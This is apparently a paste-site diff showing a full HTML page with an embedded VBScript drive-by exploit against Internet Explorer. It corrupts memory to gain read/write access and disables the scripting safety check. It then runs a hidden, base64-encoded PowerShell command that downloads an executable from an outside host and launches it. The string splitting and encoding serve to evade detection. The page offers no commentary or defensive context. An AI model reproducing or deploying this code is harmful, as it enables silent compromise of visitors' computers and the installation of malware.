View difference between Paste ID: <a href="/QhjUyGN3">QhjUyGN3</a> and <a href="/W4aVvPVX">W4aVvPVX</a>

<!doctype html>
1		<!doctype html>
2		<html lang="en">
3		<head>
4		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
5		<meta http-equiv="x-ua-compatible" content="IE=10">
6		<meta http-equiv="Expires" content="0">
7		<meta http-equiv="Pragma" content="no-cache">
8		<meta http-equiv="Cache-control" content="no-cache">
9		<meta http-equiv="Cache" content="no-cache">
10		</head>
11		<body>
12		<script type="text/vbscript">
13
14		Dim max_col
15		Dim index_vul
16		Dim index_a
17		Dim index_b
18		Dim addr
19		Dim array()
20		Dim array2(0,6)
21		Dim util_mem
22		Dim fake_array
23		Dim fake_str
24
25		Class Dummy
26		End Class
27
28		Class ClassA
29		private Sub Class_Initialize
30		ReDim array(2)
31		'IsEmpty(array)
32		End Sub
33
34		Public Default Property Get P
35		ReDim Preserve array(100000)
36
37		For i = 0 To UBound(array2,2)
38		array2(0,i) = 3
39		Next
40		For i = 0 To UBound(array)
41		array(i) = array2
42		Next
43		P=&h0fffffff
44		End Property
45		End Class
46
47		Function rw_primit()
48		array(index_vul)(index_a+2,0)=fake_array
49		array(index_b)(0,2)=CDbl("1.740885"+"34731"+"324E-310")
50
51		array(index_vul)(index_a,0)=fake_str
52		array(index_b)(0,0)=CDbl("6.365"+"98737437"+"801E-314")
53
54		util_mem=array(index_vul)(index_a,0)
55		End Function
56
57		Function read
58		read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
59		End Function
60
61		Function GetUnlt32(addr)
62		Dim value
63		array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
64		array(index_vul)(index_a+2,0)(util_mem)=8
65		value=read()
66		array(index_vul)(index_a+2,0)(util_mem)=3
67		GetUnlt32 = value
68		End Function
69
70		Set cls = New ClassA
71		array(2)=cls
72
73		IsEmpty(array)
74
75		max_col=&h0fffffff
76
77
78		For i=0 To UBound(array)
79		If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
80		index_vul=i
81		Exit For
82		End If
83		Next
84
85
86
87		For i=0 To UBound(array(index_vul),1)
88		Dim type1 ,type2 ,type3 ,type4
89		type1=VarType(array(index_vul)(i,0))
90		type2=VarType(array(index_vul)(i+1,0))
91		type3=VarType(array(index_vul)(i+3,0))
92		type4=VarType(array(index_vul)(i+4,0))
93		If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
94		index_a=i+3
95		array(index_vul)(index_a,0)="AAAA"
96		Exit For
97		End If
98		Next
99
100		For i=0 To UBound(array,1)
101		If array(i)(0,0)=8 Then
102		index_b=i
103		Exit For
104		End If
105		next
106
107
108
109		Set dm = New Dummy
110		Set array(index_vul)(index_a+4,0) = dm
111		array(index_b)(0,4) = CDbl("6.3659"+"87374378"+"01E-314") '3
112		addr=array(index_vul)(index_a+4,0)
113
114
115		fake_array=Unescape("%u0001%u0"+"880%u000"+"1%u0000%u0"+"000%u0000%u000"+"0%u0000%uffff%u"+"7fff%u00"+"00%u0000")
116		fake_str=Unescape("%u0000"+"%u0000%u"+"0000%u0000%u"+"0000%u0000"+"%u0000%"+"u0000")
117		rw_primit()
118
119
120		Dim psection
121		psection = GetUnlt32(addr+&hc)
122		dim a
123		a=psection+4
124
125		Dim p_C0leScript
126		p_C0leScript=GetUnlt32(a)
127		a=p_C0leScript+&h174
128		array(index_vul)(index_a+2,0)(a-8)=0
129		Set Object = CreateObject("Sh"+"ell.Appl"+"ication")
130		Object.ShellExecute "powe"+"rshel"+"l.ex"+"e -Window"+"Style Hi"+"dden -encod"+"edCo"+"mmand ""KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AeQBzAHcAYwBkAC4AYwBvAG0ALwB2AG8AbAAvAHMAMQAuAGUAeABlACcALAAgACcAYwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwBhAHQAdQBtADIAbAAuAGUAeABlACcAKQA7AGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQA="""
131
132		</script>
133		</body>
134		</html>